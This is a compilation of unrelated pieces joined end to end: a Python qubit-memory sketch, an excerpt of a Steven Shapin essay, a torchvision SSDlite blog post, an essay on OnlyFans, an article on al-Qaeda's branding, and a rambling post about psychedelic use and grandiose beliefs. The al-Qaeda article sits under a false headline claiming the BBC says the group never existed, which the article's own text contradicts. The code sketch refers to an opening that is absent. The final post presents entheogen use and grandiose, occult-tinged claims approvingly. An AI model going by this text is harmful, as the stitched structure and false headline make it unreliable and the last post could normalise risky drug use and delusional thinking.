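To put the space-complexity claim from the start of this piece into rough numbers, here is a small Python sketch. It assumes a dense statevector simulation with one complex128 amplitude (16 bytes) per basis state, which is just one way to simulate a circuit classically; it is an order-of-magnitude illustration, not IBM's benchmarking methodology.

```python
# Rough illustration of why each extra qubit doubles classical simulation memory:
# a dense statevector over n qubits stores 2**n complex amplitudes.
BYTES_PER_AMPLITUDE = 16  # assumes complex128 amplitudes

def statevector_bytes(n_qubits: int) -> int:
    return (2 ** n_qubits) * BYTES_PER_AMPLITUDE

for n in (65, 127, 128):  # Hummingbird, Eagle, and one qubit more
    print(f"{n:3d} qubits -> ~{float(statevector_bytes(n)):.1e} bytes")
```

Each additional qubit doubles the figure, which is why a 127-qubit device already sits far beyond what any classical machine could hold in memory as a full statevector.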
17
Invisible Science: The Scientization of the Ordinary (2016)
Steven Shapin

In Orbit, 2013, by Tomás Saraceno, installation view, Kunstsammlung Nordrhein-Westfalen, K21 Ständehaus, Düsseldorf; courtesy the artist; Tanya Bonakdar Gallery, New York; Andersen's Contemporary, Copenhagen; Pinksummer contemporary art, Genoa; Esther Schipper, Berlin; © photograph by Tomás Saraceno, 2013.

There's a McDonald's restaurant near where I live in Cambridge, Massachusetts. Roughly equidistant from Harvard and the Massachusetts Institute of Technology and close to one of the beating hearts of modern science and technology, the restaurant sits across Massachusetts Avenue from a nondescript building full of entrepreneurial electronic gaming companies. Walk a little toward the MIT end of the avenue, and you pass major institutes for bioinformatics and cancer research, at least a dozen pharmaceutical and biotech companies, outposts of Microsoft and Google, the Frank Gehry-designed Stata Center, which houses much of MIT's artificial intelligence and computer science activities (with an office for Noam Chomsky), and several "workbars" and "coworking spaces" for start-up high-tech companies. You might think that this McDonald's is well placed to feed the neighborhood's scientists and engineers, but few of them actually eat there, perhaps convinced by sound scientific evidence that Big Macs aren't good for them. (Far more popular among the scientists and techies is an innovative vegetarian restaurant across the street—styled as a "food lab"—founded, appropriately enough, by an MIT materials science and Harvard Business School graduate.) You might also assume that, while a lot of science happens at MIT and Harvard, and at the for-profit and nonprofit organizations clustered around the McDonald's, the fast-food outlet itself has little or no significance for the place of science in late modern society. No scientists or engineers (that I know of) work there, and no scientific inquiry (that I am aware of) is going on there. And yet there is a sense in which such places are scientific sites, touching our lives in ways that bear comparison with the science that happens at places like Harvard and MIT.

Reprinted from The Hedgehog Review 18.3 (Fall 2016).
1
Everything You Need to Know About Torchvision’s SSDlite Implementation
In the previous article, we discussed how the SSD algorithm works, covered its implementation details, and presented its training process. If you have not read the previous blog post, I encourage you to check it out before continuing. In this part 2 of the series, we will focus on the mobile-friendly variant of SSD called SSDlite. Our plan is to first go through the main components of the algorithm, highlighting the parts that differ from the original SSD, then discuss how the released model was trained, and finally provide detailed benchmarks for all the new Object Detection models that we explored.

SSDlite is an adaptation of SSD that was first briefly introduced in the MobileNetV2 paper and later reused in the MobileNetV3 paper. Because the main focus of the two papers was to introduce novel CNN architectures, most of the implementation details of SSDlite were not clarified. Our code follows all the details presented in the two papers and, where necessary, fills in the gaps from the official implementation. As noted before, SSD is a family of models because one can configure it with different backbones (such as VGG, MobileNetV3, etc.) and different heads (such as regular convolutions, separable convolutions, etc.). Thus, many of the SSD components remain the same in SSDlite. Below, we discuss only those that differ.

Following Section 6.2 of the MobileNetV2 paper, SSDlite replaces the regular convolutions used in the original heads with separable convolutions. Consequently, our implementation introduces new heads that use 3x3 depthwise convolutions and 1x1 projections (a rough sketch of this head pattern is shown further below). Since all other components of the SSD method remain the same, to create an SSDlite model our implementation initializes the SSDlite head and passes it directly to the SSD constructor.

Our implementation introduces a new class for building MobileNet feature extractors. Following Section 6.3 of the MobileNetV3 paper, the backbone returns the output of the expansion layer of the Inverted Bottleneck block, which has an output stride of 16, and the output of the layer just before the pooling, which has an output stride of 32. Moreover, all extra blocks of the backbone are replaced with lightweight equivalents that use a 1x1 compression, a separable 3x3 convolution with stride 2, and a 1x1 expansion. Finally, to ensure that the heads have enough prediction power even when small width multipliers are used, the minimum depth size of all convolutions is controlled by the min_depth hyperparameter.

This section discusses the configuration of the provided SSDlite pre-trained model along with the training process followed to replicate the paper results as closely as possible. All of the hyperparameters and scripts used to train the model on the COCO dataset can be found in our references folder. Here we discuss the most notable details of the training process. Though the papers don't provide any information on the hyperparameters used for training the models (such as regularization, learning rate, and batch size), the parameters listed in the configuration files on the official repo were good starting points, and using cross-validation we adjusted them to their optimal values. All of the above gave us a significant boost over the baseline SSD configuration. A key difference between SSDlite and SSD is that the backbone of the former has only a fraction of the weights of the latter.
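To make the head change concrete, here is a rough PyTorch sketch of the separable-convolution pattern described above: a 3x3 depthwise convolution followed by a 1x1 projection. It illustrates the idea rather than reproducing the actual torchvision SSDLite head; the normalization layer, activation, channel counts, and anchor count are assumptions made for the example.

```python
import torch
import torch.nn as nn

# Illustration of the SSDlite head building block: 3x3 depthwise conv + 1x1 projection.
# Not the actual torchvision implementation; norm/activation choices are assumptions.
def separable_conv(in_channels: int, out_channels: int) -> nn.Sequential:
    return nn.Sequential(
        nn.Conv2d(in_channels, in_channels, kernel_size=3, padding=1,
                  groups=in_channels, bias=False),          # depthwise
        nn.BatchNorm2d(in_channels),
        nn.ReLU6(inplace=True),
        nn.Conv2d(in_channels, out_channels, kernel_size=1),  # pointwise projection
    )

# Example: predict 4 box offsets for 6 anchors per location from a 672-channel feature map
# (all of these numbers are illustrative, not the released model's configuration).
head = separable_conv(672, 6 * 4)
print(head(torch.rand(1, 672, 20, 20)).shape)  # torch.Size([1, 24, 20, 20])
```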
Because of this, the data augmentation in SSDlite focuses more on making the model robust to objects of variable sizes than on avoiding overfitting. Consequently, SSDlite uses only a subset of the SSD transformations and in this way avoids over-regularizing the model. Due to the reliance on data augmentation to make the model robust to small and medium-sized objects, we found it particularly beneficial for the training recipe to use a large number of epochs. More specifically, by using roughly 3x more epochs than SSD we were able to increase our precision by 4.2 mAP points, and by using a 6x multiplier we improved by 4.9 mAP. Increasing the number of epochs further seems to yield diminishing returns and makes training too slow and impractical; nevertheless, based on the model configuration, it seems that the authors of the paper used an equivalent 16x multiplier.

A final set of optimizations that brought our implementation very close to the official one and helped us bridge the accuracy gap was training the backbone from scratch instead of initializing it from ImageNet, adapting our weight-initialization scheme, changing our input scaling, and replacing all standard ReLUs added to the SSDlite heads with ReLU6. Note that since we trained the model from random weights, we additionally applied the speed optimization described in the paper of using a reduced tail on the backbone.

Comparing the above implementation with the one in the official repo, we identified a few differences. Most of them are minor, and they relate to how we initialize the weights (for example, Normal initialization vs. Truncated Normal), how we parameterize the LR scheduling (for example, smaller vs. larger warmup rate, shorter vs. longer training), etc. The biggest known difference lies in the way we compute the classification loss. More specifically, the implementation of SSDlite with a MobileNetV3 backbone in the official repo doesn't use SSD's multibox loss but instead uses RetinaNet's focal loss. This is a rather significant deviation from the paper, and since TorchVision already offers a full implementation of RetinaNet, we decided to implement SSDlite using the normal multibox SSD loss.

As discussed in previous articles, reproducing research papers and porting them to code is not a journey of monotonically increasing accuracies, especially in cases where the full training and implementation details are not known. Typically, the process involves lots of backtracking, as one needs to separate the implementation details and parameters that have a significant impact on accuracy from those that don't. Below we try to visualize the most important iterations that improved our accuracy from the baseline: The order of optimizations presented above is accurate, though a bit idealized in some cases. For example, though different schedulers were tested during the hyperparameter-tuning phase, none of them provided significant improvements, and thus we maintained the MultiStepLR that was used in the baseline. Nevertheless, while later experimenting with different LR schemes, we found it beneficial to switch to CosineAnnealingLR, as it required less configuration (a hedged sketch of such a setup follows at the end of this section). Consequently, we believe that the main takeaway from the above summary should be that even by starting with a correct implementation and a set of optimal hyperparameters from a model of the same family, there are always accuracy points to be found by optimizing the training recipe and tuning the implementation.
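As a concrete illustration of the scheduler swap mentioned above, here is a hedged sketch of configuring CosineAnnealingLR in PyTorch. The optimizer settings and epoch count are placeholders, not the hyperparameters of the released recipe.

```python
import torch
import torchvision

# Hedged sketch of swapping MultiStepLR for CosineAnnealingLR, as discussed above.
# All hyperparameter values below are placeholders, not the released training recipe.
model = torchvision.models.detection.ssdlite320_mobilenet_v3_large(pretrained=False)
optimizer = torch.optim.SGD(model.parameters(), lr=0.1, momentum=0.9, weight_decay=5e-4)
num_epochs = 300  # assumed; the text only says roughly 3x-6x more epochs than SSD
scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(optimizer, T_max=num_epochs)

for epoch in range(num_epochs):
    # train_one_epoch(model, optimizer, data_loader)  # training loop elided
    scheduler.step()
```

The appeal noted in the text is that the cosine schedule needs only a single horizon (T_max) rather than hand-picked milestones.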
Admittedly, the case summarized above, where the accuracy doubled, is a rather extreme one, but in many cases there is still a large number of optimizations that can help push the accuracy significantly. Here is how to initialize the two pre-trained models:

ssdlite = torchvision.models.detection.ssdlite320_mobilenet_v3_large(pretrained=True)
ssd = torchvision.models.detection.ssd300_vgg16(pretrained=True)

Below are the benchmarks between the new and selected previous detection models: As we can see, the SSDlite320 MobileNetV3-Large model is by far the fastest and smallest model, and thus it's an excellent candidate for real-world mobile applications. Though its accuracy is lower than the pre-trained low-resolution Faster R-CNN equivalent, the SSDlite framework is adaptable, and one can boost its accuracy by introducing heavier heads with more convolutions. On the other hand, the SSD300 VGG16 model is rather slow and less accurate. This is mainly because of its VGG16 backbone. Though extremely important and influential, the VGG architecture is nowadays quite outdated. Thus, though the specific model has historical and research value and is hence included in TorchVision, we recommend that users who want high-resolution detectors for real-world applications either combine SSD with alternative backbones (see this example on how to create one) or use one of the Faster R-CNN pre-trained models. We hope you enjoyed the 2nd and final part of the SSD series. We are looking forward to your feedback.
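For completeness, here is a hedged usage sketch for the pre-trained SSDlite model initialized above. The random tensor stands in for a real image; torchvision's detection models expect a list of 3xHxW float tensors with values in [0, 1] and return one dictionary of "boxes", "labels", and "scores" per input image.

```python
import torch
import torchvision

# Minimal inference sketch for the pre-trained SSDlite model shown above.
model = torchvision.models.detection.ssdlite320_mobilenet_v3_large(pretrained=True)
model.eval()

img = torch.rand(3, 320, 320)        # placeholder image, not a real photo
with torch.no_grad():
    predictions = model([img])       # list with one dict per input image

print(predictions[0]["boxes"].shape, predictions[0]["scores"].shape)
```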
18
The Internet Is for Porn
span before . Enjoy! One of the biggest and most interesting things happening in the consumer web right now is running almost completely under the radar. It has virtually zero Silicon Valley involvement. There are no boastful VCs getting rich. It is utterly absent from tech’s plethora of twitters, fora and media (at least, as they say, “on main”). Indeed, the true extent of its incredible success has gone almost completely unnoticed, even by its many, many, many customers. I’m talking, of course, about OnlyFans. OnlyFans, the content subscription service that has come to be dominated by sex workers, has only been around since 2016. It works a bit like Instagram-meets-Patreon, or perhaps Twitch - for porn. Users pay to follow content creators and unlock exclusive material. The applications to porn are pretty obvious, and unlike its more prudish cousins, OnlyFans has openly embraced adult content creators. “OF” gives creators an array of tools for monetizing their audiences, with not only different subscription tiers, but ways to allow paying customers to directly interact with creators. OnlyFans was already growing steadily before COVID, but the platform has absolutely exploded during the pandemic in a manner of “hypergrowth” fantasy. According to their CEO , they were adding nearly 200,000 new users and 8,000 new content creators a day back in May, and have only continued to grow since . The platform now has north of 700,000 content creators (!) serving a customer base of over 50 million registered users (!!). Hard stats are hard to come by, but one figure pegged the cumulative total paid out to creators at $725 million as of May. Cardi B joined the platform in May. In short, OnlyFans is for real. It’s becoming not just the next generation of porn, but it might just represent a quantum leap in fixing one of the world’s most popular industries. And Silicon Valley has almost nothing to do with it. The reasons why are worth reflecting on. Let me stop here and say: if you’re uncomfortable with pornography, it’s better to just stop reading right here. I am unashamed to be a casual porn consumer. In this, I am extremely normal. Volumes of research show that nearly all men - old and young, married and single, straight, gay and everywhere along the spectrum - consume porn on occasion. While a majority of porn consumers are men, a huge number of women are watching, too. Pornhub reports that about a third of its American audience are women. Giggles, eye-rolls and the occasional moral scold aside, porn is a gigantic industry that serves an equally enormous popular demand. The cavernous disparity between the demonstrably massive popularity of porn and our popular unwillingness to even acknowledge it exists is a truly bizarre facet of American puritanical culture. While the oft-cited stat that porn is a third of all internet traffic is probably a myth, search engine companies say it represents about 10-15% of all queries. That’s a lot! Pornhub alone received about 120 million unique visitors a day even before COVID forced everyone indoors. By comparison, CNN reported a record-breaking 148 million uniques in the month of January. (Fox News had only 104 million.) No one’s quite sure how large the entire porn industry is, but it’s safely assumed to be in the $5 billion range at least - around a third the size of the global video game industry. In other words, porn is a huge, popular and extremely mainstream industry - which people insist on not talking about and enjoying in private. 
(Or maybe in a private browser window.) The porn industry itself has long been famously problematic. Like many industries that rely on talent that is often young and naive, greedy middlemen (almost always men) who control production and channels of distribution take all the upside for themselves. A perfect example is porn mega-name Mia Khalifa, who was paid a grand total of $12,000 for only a handful of shoots - a tiny, tiny fraction of the value her content has generated for distributors like Pornhub. Free porn sites - Pornhub chief among them - have done to the porn industry what Facebook and Google did to ad-supported media. By aggregating demand for “free” porn, they vacuumed up all the ad revenue that had once kept studios and distributors (not to mention the stars) in business while demolishing any reason to pay for their content. You can buy a subscription to sites like Pornhub, of course, but that doesn’t really solve the problem; it’s a bit like buying a subscription to Facebook to read the newspaper. While some porn actors/actresses have been able to build personal brands to monetize their content, this is an extremely difficult process. For sex workers must not only face all the normal challenges to creating unique identities online, but they must do it with an openly hostile Silicon Valley fighting them at every step. That isn’t hyperbole. At almost every turn, the tech industry has gone out of its way to penalize, marginalize and - yes - “cancel” sex workers, the overwhelming majority of whom are women responding to ravenous male demand. PayPal , Venmo , Stripe, Square and almost every other payments service shuts down their accounts. Twitter shadowbans them while Tumblr , Instagram and Snapchat either over-enforce rules or ban adult content accounts entirely. The Big Blue App, of course, doesn’t permit adult content at all - and neither does Apple or Google’s App Stores. An observer might note that all of these companies are dominated by men, in an industry dominated by men, tightly interwoven with a venture capital industry that is super-dominated by men. So it’s curious why none of these men have shown any interest in addressing the massive and lucrative sex work industry that overwhelmingly serves, well, men; until you consider who pays the real costs of that industry’s brokenness: women. Would more women in positions of power in Silicon Valley’s tech giants and top VC firms ever have funded an OnlyFans service or its like? It’s hard to say. The cultural taboos around porn are powerful - so powerful that they’ve kept an American redoubt of hyper-capitalism from even sniffing at a gigantic industry badly in need of innovation. Also, part of the sexist constructs of femininity that women operate in include ideas of purity and moral rectitude that might have discouraged them from even broaching the topic. Or maybe not. We don’t really know. Here’s what we do know: plenty of the men who have waged war on sex workers’ livelihoods from positions of enormous power in tech also consume porn and even personally hire those same sex workers. Yet when you combine American prudishness with the tech industry’s obsession with polishing mostly-male personal brands, the Valley’s refusal to consider legitimate sex worker needs becomes easier to understand. It’s unlikely that the engineers, product managers and executives who made those product decisions that upended sex workers’ lives ever understood, or perhaps even considered, their impacts. 
Or if they did, it seems that sex workers are considered expendable users. (Again, at least in public.) This has created a large digital underclass of sex workers - including, but far from limited to, adult performers - who live in fear of being banned by the big tech platforms while simply doing their jobs. The vast majority are women serving a heterosexual male audience. Most of them do nothing illegal at all, but they operate in the long shadow of those powerful (and powerfully sexist) cultural taboos and their resulting hypocritical popularity. It would not have taken a market strategy genius to spot an opening for OnlyFans here: a high-quality digital platform where adult performers can capture the lion’s share of value for their own content. And indeed, there have been other similar attempts to do this (again, ignored by mainstream tech). But what OnlyFans figured out was that to pry open consumers’ willingness to pay for porn again, they needed to offer exclusive content and the ability to interact with performers, as well as a way for creators to brand-build on their platform. The popular performer Aella , who makes something on the order of $100,000 a month on OnlyFans , discussed some of her specific monetization strategies in this fascinating (and SFW) interview: OnlyFans’ 20% cut of its creators’ revenues might be most usefully compared to Patreon’s 10% take-rate. Despite that big bite (which OnlyFans says really amounts to 12% after merchant fees and processing), OnlyFans has nevertheless scaled to roughly three-quarters of a billion in payouts in not quite 4 years, with no evident external funding. (OnlyFans is not even listed on Crunchbase). By contrast, it took Patreon 6 years , and $166 million (!) in venture funding, to reach $1 billion from 4 million “patrons.” Which of these two companies sounds more successful? To be sure, OnlyFans is not perfect. They are dealing with growth pains like subscriber churn, spam, creators who have trouble getting their payouts and a back tax problem. There are also the usual creator discovery problems that almost all influencer platforms encounter. It can be difficult for adult performers in particular to market themselves, given the strict rules about their content on many social platforms discussed above. Nevertheless, OnlyFans has distinguished itself not only by helping a very large number of sex workers make an honest living, but by treating them like first-class citizens rather than a scourge. In doing so, it’s not only saving the porn industry, but demonstrating how to make it a better, safer and more equitable place by aligning incentives for consumers and creators. The breakout success of OnlyFans is laudable, but should prompt some soul-searching in the power centers of Silicon Valley. Why did it take this long? Why would no one else have the courage to address sex work? Why does the same industry that exalts such morally ruinous firms as Palantir, Facebook and Palmer Lucky’s actual next-gen weapons startup get queasy about consenting adults wanting to see naked bodies? And if they missed this market opportunity, think about how many more are out there - invisible only to the affluent men who run “tech.” span Insights blog (SFW) is chock-full of incredible insights about global porn interests that their analytics team puts together. Yes, people are searching for “coronavirus porn”.
1
Al-Qaeda does not and never has existed says the BBC
Why are we so apt to see the terrorist group or its offshoots where they don't really exist? Diners at a Kabul restaurant watch an Afghan newscast about Osama Bin Laden's death / Reuters In the first hours after a blast shook downtown Oslo on a Friday this July, a number of writers and bloggers in the U.S. -- including me -- seemed to converge around a common assumption. "It's natural to wonder whether al-Qaeda, the world's most famous terrorist organization, might have been involved," I wrote, repeating a conclusion many of us reached, it turned out prematurely and wrongly. The real culprit, a Norwegian man named Anders Behring Breivik, would appear to be the polar opposite of an al-Qaeda agent: ultranationalist, white supremacist, xenophobic, blonde-haired, and blue-eyed. But are the distinctions between a man like Breivik and a man, for they are always men, who calls himself a member of al-Qaeda really so clear and wide? I, like so many others, had clearly been mistaken to so readily assume al-Qaeda. But the error may have revealed less about media over-reaction than about another, much larger fallacy. The world's ever-widening definition of al-Qaeda, and our ever-rising expectations of their capabilities, have so exaggerated their strength and reach in our collective imaginations that we are ready to see them behind nearly every blast. MORE ON AL-QAEDA 10 YEARS LATER J.M. Berger: Anwar al-Awlaki and the Hijackers William McCants and William Rosenau: We've Won the War Daveed Gartenstein-Ross: Al-Qaeda Is Winning Thanassis Cambanis : We Still Don't Get the Threat of Non-State Actors In the decade since September 11, al-Qaeda has become physically isolated, less capable of striking its enemies, and largely shunned by the worldwide Islamic community it had wanted to lead. But it has succeeded enormously in persuading many in the West of much the opposite. Al-Qaeda wants us to see them everywhere, to imagine the group as a global movement with bloodthirsty agents in every corner, waiting for the order to strike. And we have often obliged, slapping al-Qaeda's label on just about every militant group or homicidal fanatic that happens to observe Islam, the world's second most common religion. How we got here reveals as much about our own propensity for over-reaction as it does about al-Qaeda's one remaining great skill: branding. The story of how al-Qaeda came to be is a famous one. A movement of Arab Islamists who went to fight in Afghanistan against the Russian army later turned their experience and their ideology, sharpened by the 1990 Gulf War, against the "apostate" regimes back home, particularly in Saudi Arabia and Egypt, and the Western nations supporting them. But what about the supposed al-Qaeda branch-offs that have displaced the original group (now largely contained in the Afghanistan-Pakistan border region) in ability to both kill and to terrify Westerners on al-Qaeda's behalf? Their stories are a little different -- and don't quite fit with what al-Qaeda would like you to believe. In 1991, Algeria held its first-ever real democratic elections. But when the Islamist party swept the first round of voting, Algeria's army staged a coup and cancelled the elections. Members and followers of the Islamist party took up arms against the new government, and soon some of the fighters formed what they called the Armed Islamic Group, an insurgency aimed at putting the democratically elected Islamists in power. 
In 1999, as it became clear the army would win the war, many members of the Armed Islamic Group accepted an offer of amnesty, laying down their arms. Some of the fighters refused, however, and declared a new name: the Salafist Group for Preaching and Combat. They kept fighting, though with less and less support from war-weary Algerians. Throughout the next decade, the increasingly marginalized SGPC slid into criminality, ransoming foreign tourists and terrorizing local villages. When the U.S-led coalition invaded Iraq in 2003, many of Algeria's angry young Islamist men -- the field of potential SGPC recruits -- rushed off to fight the American occupation. Suddenly bereft of new fighters and of donations (money had come mainly from Algerian exiles in France who were still furious at the military regime, but who now preferred to support the fighters in Iraq), the SGPC fell on hard times. Some officers deserted or accepted government amnesty offers. Then, in 2006, the group tried something that had worked for it before: rebranding. As it had in 1999, it changed its name. Or, more accurately, it adopted someone else's: al-Qaeda in the Islamic Maghreb. Al-Qaeda operational chief Ayman al-Zawahiri, always happy to take credit for someone else's fighting, claimed the Algerian movement as his own. In return, the SQPC could use al-Qaeda's cachet to improve their pitch to potential recruits and donors. But the 15-year-old group didn't appear to operate much differently now that it was a self-declared wing of al-Qaeda, and it didn't seem to pose much more of a threat to anyone, especially anyone outside of Algeria. But one thing did change: in 2007, Algeria got a big bump in foreign aid from the U.S., including $875,000 from the Pentagon alone. Such is the trend of al-Qaeda's supposed branches: local militant groups that have little interest in al-Qaeda's globally oriented ideology or mission nonetheless find it useful to claim they do. Often, whatever government is fighting that local group i finds it useful to claim an al-Qaeda connection, as Western governments tend to be willing to overlook abuses by and write lavish checks to a government that says it is at war with al-Qaeda. But no one seems to like this arrangement more than al-Qaeda itself, that handful of militants dodging drone strikes in the ungoverned backwaters of Yemen and Pakistan. Rather than fess up and admit defeat, al-Qaeda officers can claim virtually any Islamist militant group or gun-waving Muslim as part of their dark, global army. Because we so often believe them, al-Qaeda can accomplish the goal that once required committing successful acts of terrorism: terrorize Westerners. This history is now repeating itself in Nigeria. In 2002, militants in Nigeria's poorer, Muslim north formed a group they called Boko Haram to fight the police and government, which they resent as dominated by the wealthier, Christian south. They adopted acts of terrorism to further their cause. Sure enough, this August, reports began appearing about possible "links" to al-Qaeda. But phrases like "al-Qaeda affiliated" and "al-Qaeda linked" can mean much less than they might sound like they mean. The case for Boko Haram's "links" appears slim: members took trips to meet and train with al-Qaeda "affiliates," later adopting what looks like a version of their bombing technique. That "affiliate," however, was none other than al-Qaeda in the Islamic Maghreb, the Algerian group. 
Al-Qaeda is surprisingly successful at selling its logic, in which the most tenuous financial, ideological, or even personal connection is used as evidence of their control over another group or individual. (Their evidence that U.S. Army Major Nidal Hasan was working for al-Qaeda when he descended into psychopathy and shot several fellow soldiers? He had exchanged some apparently mundane emails with Anwar al-Awlaki.) But does that logic really hold? An anti-government insurgent in a Muslim-majority country might be considered an "al-Qaeda affiliated" in the same way that, for example, a low-level officer in the Pakistani army could be called "U.S. affiliated." The officer's organization gets some funding from the U.S., the Pakistani officer and the U.S. share a few common enemies and common allies, he may have received some training at some point from an American, and the officer's bosses are likely to maintain diplomatic links to the U.S. government. But we don't consider every rank-and-file Pakistani army officer an American agent, or assume his every action comes at the behest of top-level American leadership. Only when it comes to Islamist terrorist groups do we draw such conclusions. Still, it's not hard to see how we keep making the mistake of over-estimating al-Qaeda. Violent conflict is, for reasons having to do with the end of colonialism and the proxy conflicts of the Cold War, disproportionately common in countries with a significant Muslim populations. Al-Qaeda's ideology, designed during the Afghan war against Soviet occupation, claims common cause with every armed Islamic group, of which there are a few. And large-scale terrorist attacks against civilians, though pioneered during the Latin American conflicts of the 1980s, have been seared into the American imagination as a tool of al-Qaeda by the attacks of September 11, leading us to believe al-Qaeda when they tell us that every group that builds bombs and observes Islam must be part of the same monolithic force. But the great al-Qaeda menace is not what they would have us believe. Look at the data: the wave of terrorist attacks against the West, which September 11 was supposed to inspire, never came: not from the real al-Qaeda, which paid dearly for their attack, and not from the so-called "franchises" that show little real interest in following al-Qaeda's suicidal mission. The two exceptions are in Yemen, where the al-Qaeda off-shoot does want to mimic Osama bin Laden's jihad but has so far succeeded mostly in achieving his group's extreme isolation; and in Iraq. There, following the U.S.-led invasion, al-Qaeda-appointed officers were able to recruit as many as a few thousand fighters from the Middle East and North Africa to turn Iraq into a terrorist's playground. But it's worth considering that al-Qaeda would not have been able to do this without the 2003 invasion that threw Iraq into chaos in the first place. That was itself was inspired by American overreaction to al-Qaeda. At the time, 70 percent of Americans believed Saddam Hussein had been personally involved in the September 11 attacks; 80 percent believed he had ties to al-Qaeda. But who doesn't?
1
'meaning' v0.01 – or, why I, the agnostic rationalist think I'm maybe Jesus?
first things first: nullius in verba. take no one’s word for anything. you should only accept the ideas i advance if they are the best explanations you have heard… Welcome to the edge of my mind, a vast network of neurons stubbornly unwilling to sync its premises with the group, because i’ve been shown truth, meaning, and various weird inexplicable things by the all powerful mushroom gods… so now either i’m right and you all have to sync with me, or i’m not, and i seriously should slow down on drugs and probably get a job on team powerpoint & boring meetings… this is my last shot, my moonshot… cause maybe, just maybe i am standing on the peak of current knowledge, surrounded by babbling babies trying to throw their perscription loops at me. but i think i escaped… i’ve reached escaped velocity on personal knowledge… and it’s… absolutely crazy to everyone around me, and absolutely fucking trippy to me too… as a narrow, risky prediction, that should instantly interest smart people everywhere: i’m pretty sure i can now, with the right mental representations of consciousness, and 10 years of deliberate practice… may be able to turn off my default mode network somewhat at will, as evidenced by my eyes going in and out of the wide-eyed trippy crazy thing… throughout the day… which i achieved via… lots of entheogens, mainly, plus limit experiences, and an extremely robust verbal baby brain that likes to explain shit… and a lot of longer meditations inspired by naval and kapil… almost like my reducing valve has been solved, and my brain is suddenly doing a lot more, because i solved the source code of the prescription brain…. inevitably the mind needs a meta-framework by which to program itself, and i think the key principle that got me into personal knowledge escape velocity (aka ‘craziness’, or ‘petulant unwillingness to sync back to the ~7 billion clever selfish verbally advanced baby brains who comprising the herd referred to as ‘society’)… is that the mind may only use force to align other fundamental forces into positive sum / pareto optimal arrangements… oh, and i went from 100% woo woo stuff does not ‘make sense’ about 4 weeks ago, to… as i mentioned… thinking i’m god? so it’s been a bit of a ride over here… and similarly, i’m pretty sure all the ‘crazy’ people were onto something… my hunch is that the following are all fundamental forces yet to be fully understood: stars / horoscopes, volcanoes / reptilians, death / ghosts, ufos / aliens, numbers / numerology. i drafted this post in the womb, but have spent the last rest of my life fine-tuning the the punctuation and prose to make sure it doesn’t seem like a patchy drug rant inspired largely by visions the sneaky mushroom gods showed me 5 days ago, on ‘labor day’ as the power point army calls it, or ‘rosh hashanah’ as my Jewish friends call it… but anyways, full disclosure… i did in fact, a few times before, ‘do the drugs’ as they put it these days, and… everything they said about the slippery slope is true. once you ‘do the drugs’ once… you have fun and, for some reason, after the fun… you want to do the fun thing more… because it’s fun. that’s why. 
because of the fun you have… though be warned, when the mind confuses wants with feels, you’ll quickly become addicted to your wants… but anyways, i know that a lot of the prescription lizards out there follow the very, very, very simple mental model that ‘drugs are bad, mmmmkay’, and the very, very, simple implication that ‘people who do the drugs are bad’… well yeah… for you all out there… i ‘do the drugs’ and i am therefore ‘bad’. so proceed with my madness accordingly… …oh, but also… heads up to those same people… just to jam you lizard brain into perscription loop mania — i am currently fully sober — water + crackers + sleep. no sugar, no coffee, no booze (e.g. yes you’re on way more drugs than me, right now)… …and also, i’m in excellent shape (his still sometimes grippy ego said somewhat over-confidently, ‘decent shape’ might be more… ‘accurate’)… but to be more objective: my resting heart rate is ~40bpm, my sleepwatch app says i sleep pretty good, i can run a mile in… umm… i haven’t actually ran one in a while, but i’d say, overconfidently, ~6 minutes… … and, no worries, you fragile worry minds out there… we are already full steam ahead looping through the two go-to prescriptions for this situation, ‘call cops’ and ‘send to hospital’…) when someone is ‘crazy’, e.g. ‘unwilling to concede to the herd, unless someone in the herd can explain the herds argument’… …so yeah, to help make sure this isn’t ‘mania’ for them… i’m even taking a break from the psychiatrist-grade meth aka adderall my quack gives for my me ‘attention deficit disorder’, which i used to misdiagnose as my hatred for doing boring trivial meaningless things, before realizing that was actually my mental illness, and healthy people actually really enjoy that type of stuff… … so anyways, here we are. i am the stubborn roam graph unwilling to sync to the world. so here we go world. me v you… … and, heads up, i’m going to win. you all are going to join me… … cause i found the rational meme that turns finite into infinite games, and infinite games into finite ones… i’m either on the peak of the mountain of knowledge, or insanity. i feel deserving of either a modest substack to support my consciousness spelunking and subsequent drug rambles… or, if i’m onto something clever, like the other genius babies wielding the leverage of the world… then, i’d like to offer my candidacy to be your meme lord / philosopher king… basically like the joker… but good... chaotic good. i hope this little idea, this crystalline structure of semantic symbols, this unique snowflake… can replicate in your mind, and the minds around you… to grow into the avalanche that (lovingly) sweeps the world… oh god, here we are, at the peak of a mountain, crazy, or genius, full. send. 
